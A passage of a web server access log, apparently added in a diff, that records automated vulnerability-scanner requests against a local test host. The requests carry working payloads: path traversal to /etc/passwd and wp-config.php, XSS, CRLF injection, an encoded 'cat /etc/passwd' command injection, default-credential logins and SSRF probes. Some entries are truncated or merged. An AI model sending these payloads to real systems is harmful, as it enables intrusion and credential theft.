Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2f.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static?/%2557EB-INF/web.xml HTTP/1.1","status":"301","body_bytes_sents":"169","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /NateMail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%2829KBaA77U37Lbpuoa81oMRIn8Ie%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KBaN0JpIlcDflrvipF9FIjkaI.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"_charset_=utf-8&j_username=admin&j_password=admin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 